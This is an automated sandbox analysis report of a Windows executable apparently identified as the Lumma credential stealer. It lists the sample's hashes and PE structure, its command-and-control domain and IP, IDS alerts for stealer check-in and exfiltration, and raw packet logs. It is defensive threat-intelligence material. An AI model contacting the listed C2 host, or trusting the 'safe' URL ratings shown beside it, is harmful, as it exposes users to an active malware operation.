                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.microsofBootstrapper.exe, 00000000.00000003.2394578963.0000000002963000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dxkushha.com/apimpQBootstrapper.exe, 00000000.00000003.2446824381.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446910419.000000000291F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://dxkushha.com/DBootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://dxkushha.com/Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2551636305.000000000290B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dxkushha.com/LBootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allBootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.80.1
                                                                              dxkushha.comUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1581127
                                                                              Start date and time:2024-12-27 03:34:10 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 5m 33s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:15
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Bootstrapper.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 69%
                                                                              • Number of executed functions: 9
                                                                              • Number of non-executed functions: 35
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63, 20.190.147.5, 20.223.36.55, 2.16.158.56
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              21:36:10API Interceptor8x Sleep call for process: Bootstrapper.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.80.1SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • www.dejikenkyu.cyou/pmpa/
                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                              • hiranetwork.com/administrator/index.php
                                                                              downloader2.htaGet hashmaliciousXWormBrowse
                                                                              • 2k8u3.org/wininit.exe
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSNewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.190.223
                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.197.192
                                                                              exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.218.163
                                                                              http://kxyaiaqyijjz.comGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              https://pdf-ezy.com/pdf-ez.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.152.3
                                                                              b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                              • 172.67.194.29
                                                                              tBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 104.21.49.159
                                                                              phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                              • 172.67.214.186
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                                              • 104.21.80.1
                                                                              installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                              • 104.21.80.1
                                                                              0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              RUUSfr6dVm.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.80.1
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.998151135230971
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Bootstrapper.exe
                                                                              File size:1'003'520 bytes
                                                                              MD5:ff6c56326f0ee63ca9360576a7449ff5
                                                                              SHA1:0ee6aa098523f43dcd93dedaab26b7a13f37aec7
                                                                              SHA256:aafa6952bb4c20240c67300a13ca97756ac5907f2abfbad9b76a6377605e3bf4
                                                                              SHA512:631308c7104f958d8a36e9eb01a7c00c35e2092055301cca89c2669b3b3ee141129e7ff7838fb4c6d2af20fd1f3b6e57035f74805c2e02d4ed68c4b4ac7583d0
                                                                              SSDEEP:12288:uN0UPY5+8dUs8QPVXFtx0MSw/omm+ryTvAWZvDNw2XaOvvd8tuKBSympkM+d55YK:a7MKQdXzx0ORmPNw0auqSzKMjC
                                                                              TLSH:00258D3693B19012F8A319B44A9762F2943CB6B0479447D363C85DFED0B1AD8ED34B6B
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v..\.j.\.j.\.j...i.Q.j...o...j...n.O.j..bo.z.j..bn.L.j..bi.N.j...k.Y.j.\.k...j..bb.].j..b..].j..bh.].j.Rich\.j................
                                                                              Icon Hash:b1b0b0b08888b0a2
                                                                              Entrypoint:0x45bd30
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x676D9F40 [Thu Dec 26 18:24:00 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:c7c33d78106fb52cd60f8764c9330a24
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              call 00007F0E2CF8092Dh
                                                                              pop ebp
                                                                              ret
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push 00000000h
                                                                              call dword ptr [0048D03Ch]
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              push eax
                                                                              call dword ptr [0048D038h]
                                                                              push C0000409h
                                                                              call dword ptr [0048D004h]
                                                                              push eax
                                                                              call dword ptr [0048D040h]
                                                                              pop ebp
                                                                              ret
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              sub esp, 00000324h
                                                                              push 00000017h
                                                                              call dword ptr [0048D044h]
                                                                              test eax, eax
                                                                              je 00007F0E2CF80C29h
                                                                              mov ecx, 00000002h
                                                                              int 29h
                                                                              mov dword ptr [004E9068h], eax
                                                                              mov dword ptr [004E9064h], ecx
                                                                              mov dword ptr [004E9060h], edx
                                                                              mov dword ptr [004E905Ch], ebx
                                                                              mov dword ptr [004E9058h], esi
                                                                              mov dword ptr [004E9054h], edi
                                                                              mov word ptr [004E9080h], ss
                                                                              mov word ptr [004E9074h], cs
                                                                              mov word ptr [004E9050h], ds
                                                                              mov word ptr [004E904Ch], es
                                                                              mov word ptr [004E9048h], fs
                                                                              mov word ptr [004E9044h], gs
                                                                              pushfd
                                                                              pop dword ptr [004E9078h]
                                                                              mov eax, dword ptr [ebp+00h]
                                                                              mov dword ptr [004E906Ch], eax
                                                                              mov eax, dword ptr [ebp+04h]
                                                                              mov dword ptr [004E9070h], eax
                                                                              lea eax, dword ptr [ebp+08h]
                                                                              mov dword ptr [004E907Ch], eax
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9bb4c0x3c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xec0000x4fbd.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xf10000x855c.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x9ab1c0x54.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9ab700x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x140.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x8be0a0x8c00074a6fcd0570c1e7364e2888f5b1f8c01False0.48225795200892857data6.2834396092325155IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x8d0000xf2740xf400bca10ccbf59dceb3893b02613b0a2ae0False0.3246029713114754data4.587269976868019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x9d0000x4d0b00x4c0008a15a0113824fea51a6b990ae465694fFalse0.6649105674342105data7.5113353136640955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .fptable0xeb0000x800x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xec0000x4fbd0x5000cbf820a7a4d3b2be31ce063858d8306eFalse0.57578125data5.282926026573821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xf10000x855c0x86002bdc0e00b7b6acc1bd3c435665a46cfeFalse0.7974871735074627data6.810678524311397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xec3a00x183ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8991298743151789
                                                                              RT_MENU0xedbe00x2aedata0.5408163265306123
                                                                              RT_MENU0xede900x472data0.5263620386643234
                                                                              RT_DIALOG0xee3040x470data0.4920774647887324
                                                                              RT_DIALOG0xee7740x384data0.5422222222222223
                                                                              RT_DIALOG0xeeaf80x2fcdata0.574607329842932
                                                                              RT_DIALOG0xeedf40x410data0.5201923076923077
                                                                              RT_DIALOG0xef2040x584data0.476628895184136
                                                                              RT_DIALOG0xef7880x5acdata0.5130853994490359
                                                                              RT_DIALOG0xefd340x37cdata0.5269058295964125
                                                                              RT_DIALOG0xf00b00x2d8data0.5576923076923077
                                                                              RT_DIALOG0xf03880x3a8data0.5576923076923077
                                                                              RT_DIALOG0xf07300x3c4data0.5238589211618258
                                                                              RT_GROUP_ICON0xf0af40x14data1.05
                                                                              RT_VERSION0xf0b080x338dataEnglishUnited States0.4963592233009709
                                                                              RT_MANIFEST0xf0e400x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                              DLLImport
                                                                              KERNEL32.dllVirtualProtect, GetCurrentProcess, GetStdHandle, WriteFile, CreateFileW, GetCurrentThreadId, GetModuleHandleA, GetLastError, GetCurrentThread, GetCurrentProcessId, GetProcessHeap, GetModuleHandleW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle
                                                                              USER32.dllMessageBoxA, MessageBoxW
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-27T03:36:10.657013+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753104.21.80.1443TCP
                                                                              2024-12-27T03:36:11.439483+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449753104.21.80.1443TCP
                                                                              2024-12-27T03:36:11.439483+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449753104.21.80.1443TCP
                                                                              2024-12-27T03:36:12.842618+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449759104.21.80.1443TCP
                                                                              2024-12-27T03:36:13.648154+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449759104.21.80.1443TCP
                                                                              2024-12-27T03:36:13.648154+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449759104.21.80.1443TCP
                                                                              2024-12-27T03:36:15.209779+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449766104.21.80.1443TCP
                                                                              2024-12-27T03:36:16.902979+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449766104.21.80.1443TCP
                                                                              2024-12-27T03:36:18.283975+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449775104.21.80.1443TCP
                                                                              2024-12-27T03:36:20.791685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449782104.21.80.1443TCP
                                                                              2024-12-27T03:36:23.820777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449788104.21.80.1443TCP
                                                                              2024-12-27T03:36:26.074730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449794104.21.80.1443TCP
                                                                              2024-12-27T03:36:28.695448+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449801104.21.80.1443TCP
                                                                              2024-12-27T03:36:29.471988+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449801104.21.80.1443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 27, 2024 03:36:09.274281979 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:09.274317980 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:09.274388075 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:09.277354956 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:09.277368069 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:10.656869888 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:10.657012939 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:10.658483982 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:10.658492088 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:10.658720016 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:10.704179049 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:10.704209089 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:10.704250097 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:11.439507008 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:11.439620018 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:11.439707041 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:11.442007065 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:11.442022085 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:11.442033052 CET49753443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:11.442038059 CET44349753104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:11.457165003 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:11.457194090 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:11.457350969 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:11.457520008 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:11.457534075 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:12.842557907 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:12.842617989 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:12.843821049 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:12.843827963 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:12.844022036 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:12.845223904 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:12.845242023 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:12.845274925 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.648164034 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.648241043 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.648276091 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.648289919 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.648300886 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.648441076 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.648446083 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.656621933 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.656677008 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.656682014 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.671962976 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.672005892 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.672010899 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.722589970 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.722595930 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.767792940 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.767976999 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.767982006 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.816338062 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.849147081 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.849278927 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.849368095 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.849632025 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.849642038 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.849653006 CET49759443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.849657059 CET44349759104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.996978998 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.997024059 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:13.997085094 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.997375011 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:13.997386932 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:15.209585905 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:15.209779024 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:15.210834980 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:15.210864067 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:15.211082935 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:15.216058016 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:15.216201067 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:15.216243029 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:15.216315985 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:15.216332912 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:16.902982950 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:16.903063059 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:16.903100014 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:16.903244972 CET49766443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:16.903253078 CET44349766104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:16.982728958 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:16.982760906 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:16.982827902 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:16.983046055 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:16.983057976 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:18.283776999 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:18.283974886 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:18.285181999 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:18.285192013 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:18.285389900 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:18.286511898 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:18.286644936 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:18.286673069 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:19.164381027 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:19.164457083 CET44349775104.21.80.1192.168.2.4
